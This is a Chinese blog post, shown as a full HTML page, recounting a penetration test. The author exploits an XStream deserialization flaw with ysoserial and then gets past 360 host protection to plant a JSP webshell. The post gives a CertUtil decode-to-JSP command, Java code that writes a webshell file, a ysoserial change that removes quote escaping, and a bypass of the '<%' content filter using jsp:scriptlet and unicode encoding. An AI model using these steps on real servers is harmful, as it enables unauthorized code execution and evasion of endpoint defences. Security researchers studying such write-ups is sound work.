<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.8.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"x-f1v3.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"hide","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="一次对反序列化漏洞的利用和主机防御绕过">
<meta name="keywords" content="姿势,WAF">
<meta property="og:type" content="article">
<meta property="og:title" content="一次对反序列化漏洞的利用和主机防御绕过">
<meta property="og:url" content="http://x-f1v3.github.io/blog/untitled-1629284496877.html">
<meta property="og:site_name" content="F1v3&#39;s Notes">
<meta property="og:description" content="一次对反序列化漏洞的利用和主机防御绕过">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2021-08-18T11:04:38.103Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="一次对反序列化漏洞的利用和主机防御绕过">
<meta name="twitter:description" content="一次对反序列化漏洞的利用和主机防御绕过">

<link rel="canonical" href="http://x-f1v3.github.io/blog/untitled-1629284496877.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>一次对反序列化漏洞的利用和主机防御绕过 | F1v3's Notes</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">F1v3's Notes</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://x-f1v3.github.io/blog/untitled-1629284496877.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="F1v3">
      <meta itemprop="description" content="F1v3's Notes">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="F1v3's Notes">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一次对反序列化漏洞的利用和主机防御绕过
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-08-18 19:01:36 / Modified: 19:04:38" itemprop="dateCreated datePublished" datetime="2021-08-18T19:01:36+08:00">2021-08-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/漏洞利用/" itemprop="url" rel="index"><span itemprop="name">漏洞利用</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>2.1k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>2 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>一次对反序列化漏洞的利用和主机防御绕过<br><a id="more"></a></p>
<p>无图…</p>
<p>在测试中发现一处 XStream 反序列化漏洞，使用 <code>ysoserial</code> 的 <code>CommonsBeanutils1</code> 的方式能成功远程代码执行，尝试使用系统命令写入 txt 文件成功：尝试写入 jsp 文件也成功，内容是 <code>test</code>。瞬间感觉稳了。</p>
<p>立马准备写入蚁剑马，但是由于马有点长，又有特殊符号，直接用 <code>cmd.exe /c echo xx &gt; 1.jsp</code> 的方式肯定不科学，所以用 <code>CertUtil</code> 马命令解码的方式写入文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo dGVzdA== &gt;web/a.txt &amp; CertUtil -decode web/a.txt web/b.jsp</span><br></pre></td></tr></table></figure></p>
<p>结果是 txt 文件存在， jsp 文件 404，这时觉得是马的问题，可能服务器上有啥防护，因为不能出网，所以也只能写文件了。之后用同样的 <code>CertUtil</code> 这种方式换了好几个免杀马都是404，这就很奇怪，难道现在的防护都怎么牛逼的吗？顿时觉得不太可能，也有可能是 <code>CertUtil</code> 这个命令的问题。</p>
<p>于是把内容换成正常的，在解码成后缀是 txt 的，结果还是没有解码后的文件，这里可以确认是命令被拦截了。</p>
<p>既然不能用 <code>CertUtil</code> 所以想着直接用代码写文件算了，因为是任意代码执行，所以用代码写文件应该是没问题的：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">String encodedText = &quot;PCUKb3V0LnByaW50KCJ0ZXN0Iik7CiU+&quot;;</span><br><span class="line">java.util.Base64.Decoder decoder = java.util.Base64.getDecoder();</span><br><span class="line">String  code_1 = new String(decoder.decode(encodedText), &quot;UTF-8&quot;);</span><br><span class="line">java.io.PrintWriter pu=new java.io.PrintWriter(new java.io.FileOutputStream(&quot;../1.jsp&quot;));</span><br><span class="line">pu.write(code_1);</span><br><span class="line">pu.close();</span><br></pre></td></tr></table></figure></p>
<p>不过本地测试成功，线上一直没成功，也不清楚是啥原因，这条思路又断了。</p>
<p>只能回到之前的 <code>cmd.exe /c echo xx &gt; 1.jsp</code> 这种成功的方式了，打算直接写入马，因为是直接使用 <code>ysoserial</code> 的 <code>CommonsBeanutils1</code>，所以在命令中加入双引号是个问题：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String cmd = &quot;java.lang.Runtime.getRuntime().exec(\&quot;&quot; + command.replaceAll(&quot;\\\\&quot;, &quot;\\\\\\\\&quot;).replaceAll(&quot;\&quot;&quot;, &quot;\\\&quot;&quot;) + &quot;\&quot;);&quot;;</span><br></pre></td></tr></table></figure></p>
<p>省的麻烦，直接改造一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String cmd = &quot;java.lang.Runtime.getRuntime().exec(\&quot;&quot; + command + &quot;\&quot;);&quot;;</span><br></pre></td></tr></table></figure></p>
<p>直接用 <code>cmd.exe /c  echo \&quot;123\&quot; ../1.jsp</code> 即可写入；</p>
<p>接下来写马，因为之前内容为 <code>test</code> 的 jsp 文件写入成功了，但是马写入失败，所以先写入一个测试的 jsp，内容为 <code>&lt;% out.print(&quot;test&quot;); %&gt;</code> ，失败。</p>
<p>写入测试的 txt，内容为 <code>&lt;% out.print(&quot;test&quot;); %&gt;</code>，成功；<br>把写入的 txt 文件用 <code>move</code> 命令改成 jsp 后缀，失败；<br>写入测试的 jsp，内容为 <code>&lt;%  %&gt;</code>，失败；<br>写入测试的 jsp，内容为 <code>&lt;123</code>，成功；</p>
<p>所以最后得出的结论是拦截内容中有 <code>&lt;%</code> 的后缀为 jsp 文件。这个可以用 <code>&lt;jsp:scriptlet&gt;</code> 替代。</p>
<p>最终使用 <code>&lt;jsp:scriptlet&gt;</code> 加上部分 <code>unicode</code> 编码绕过，成功传马，看了下进程，发现防御软件是数字全家桶：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">映像名称                       PID 会话名              会话#       内存使用 </span><br><span class="line">========================= ======== ================ =========== ============</span><br><span class="line">System Idle Process              0 Services                   0         24 K</span><br><span class="line">System                           4 Services                   0        372 K</span><br><span class="line">ZhuDongFangYu.exe              528 Services                   0     43,836 K</span><br><span class="line">360rp.exe                     5552                            1  1,115,180 K</span><br><span class="line">QQProtect.exe                 5024 Services                   0     22,220 K</span><br><span class="line">QQExternal.exe                8944                            1     20,244 K</span><br><span class="line">wdswfsafe.exe                 7056                            1     19,132 K</span><br><span class="line">360bdoctor.exe               23072                            1     16,264 K</span><br><span class="line">360tray.exe                  26164                            1    416,292 K</span><br><span class="line">360se.exe                    36916                            1     38,628 K</span><br><span class="line">360PatchMgr.exe              16528 Services                   0      9,728 K</span><br></pre></td></tr></table></figure></p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/姿势/" rel="tag"><i class="fa fa-tag"></i> 姿势</a>
              <a href="/tags/WAF/" rel="tag"><i class="fa fa-tag"></i> WAF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/blog/1627537078445.html" rel="prev" title="Weblogic反序列化漏洞分析（CVE-2021-2394）">
      <i class="fa fa-chevron-left"></i> Weblogic反序列化漏洞分析（CVE-2021-2394）
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">F1v3</p>
  <div class="site-description" itemprop="description">F1v3's Notes</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">F1v3</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">83k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">1:16</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

</body>
</html>
